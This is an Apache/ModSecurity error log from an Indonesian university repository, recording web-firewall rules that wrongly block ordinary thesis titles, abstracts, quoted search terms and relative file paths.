[Mon Aug 28 10:30:25.834355 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH DEBT TO EQUITY RATIO DAN NET\\x0d\\x0aPROFIT MARGIN TERHADAP EARNING PER SHARE \\x0d\\x0a(Studi Pada Subsektor Transportasi Periode 2016-2020)\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwU0cCo-f0AAJ2Y3ywAAAAX"]
[Mon Aug 28 10:57:18.097044 2023] [:error] [pid 40878] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbHsCo-f0AAJ@ubSIAAAAI"]
[Mon Aug 28 10:57:24.881554 2023] [:error] [pid 40874] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbJMCo-f0AAJ@qtKgAAAAC"]
[Mon Aug 28 10:57:27.357111 2023] [:error] [pid 40918] [client 47.128.27.219] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_page-0001.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwbJ8Co-f0AAJ-Wm18AAAAH"]
[Mon Aug 28 10:57:31.857426 2023] [:error] [pid 40919] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbK8Co-f0AAJ-XXt4AAAAN"]
[Mon Aug 28 10:57:33.339510 2023] [:error] [pid 40919] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbLcCo-f0AAJ-XXt8AAAAN"]
[Mon Aug 28 10:57:42.404907 2023] [:error] [pid 40818] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbNsCo-f0AAJ9yF30AAAAJ"]
[Mon Aug 28 10:57:58.617579 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbRsCo-f0AAJ-VOnsAAAAQ"]
[Mon Aug 28 10:57:59.604093 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbR8Co-f0AAJ-VOnwAAAAQ"]
[Mon Aug 28 10:57:59.791847 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbR8Co-f0AAJ-VOn0AAAAQ"]
[Mon Aug 28 10:57:59.973014 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbR8Co-f0AAJ-VOn4AAAAQ"]
[Mon Aug 28 10:58:00.160279 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbSMCo-f0AAJ-VOn8AAAAQ"]
[Mon Aug 28 10:58:02.476120 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbSsCo-f0AAJ-VOoAAAAAQ"]
[Mon Aug 28 10:58:04.236450 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTMCo-f0AAJ-VOoEAAAAQ"]
[Mon Aug 28 10:58:04.994598 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTMCo-f0AAJ-VOoIAAAAQ"]
[Mon Aug 28 10:58:05.361251 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTcCo-f0AAJ-VOoMAAAAQ"]
[Mon Aug 28 10:58:05.777129 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTcCo-f0AAJ-VOoQAAAAQ"]
[Mon Aug 28 10:58:06.118479 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTsCo-f0AAJ-VOoUAAAAQ"]
[Mon Aug 28 10:58:06.435988 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbTsCo-f0AAJ-VOoYAAAAQ"]
[Mon Aug 28 10:58:08.548174 2023] [:error] [pid 40917] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: . \\x0d\\x0a found within ARGS:notes: Penegakan kode etik jaksa sebagai pedoman yang mengatur perilaku Jaksa \\x0d\\x0adalam menjalankan profesinya di Indonesia dan bagaimana penyelesaian\\x0d\\x0apelanggaran kode etik terhadap jaksa yang melakukan tindak pidana\\x0d\\x0azina/perselingkuhan. Metode yang digunakan dalam pembuatan skripsi ini adalah metode penelitian yuridis normatif yaitu penelitian yang difokuskan mengkaji kaidahkaidah atau norma yang terdapat dalam hukum positif yang dimana proses..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwbUMCo-f0AAJ-VOocAAAAQ"]
[Mon Aug 28 11:07:12.046451 2023] [:error] [pid 40964] [client 47.128.29.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MODERN LIBRARY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwdcMCo-f0AAKAETTIAAAAU"]
[Mon Aug 28 11:11:50.356567 2023] [:error] [pid 41146] [client 47.128.23.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Desentralisasi, Total Quality Management, Kinerja \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwehsCo-f0AAKC62ckAAAAN"]
[Mon Aug 28 11:16:02.299927 2023] [:error] [pid 40940] [client 47.128.30.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22WAY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwfgsCo-f0AAJ-s5YwAAAAV"]
[Mon Aug 28 11:16:02.652179 2023] [:error] [pid 40940] [client 47.128.30.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22WAY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwfgsCo-f0AAJ-s5Y0AAAAV"]
[Mon Aug 28 11:17:02.113903 2023] [:error] [pid 41199] [client 47.128.29.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tomy Primadi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwfvsCo-f0AAKDvaH0AAAAE"]
[Mon Aug 28 11:22:35.723180 2023] [:error] [pid 41203] [client 52.167.144.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HARJONO, DHANISWARA K\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwhC8Co-f0AAKDz6VMAAAAM"]
[Mon Aug 28 11:31:10.385220 2023] [:error] [pid 41450] [client 156.59.198.135] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Fiscal_and_Monetary_Policy_in_the_Eurozone.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwjDsCo-f0AAKHqvlwAAAAG"]
[Mon Aug 28 11:33:33.661205 2023] [:error] [pid 41463] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwjncCo-f0AAKH38b4AAAAB"]
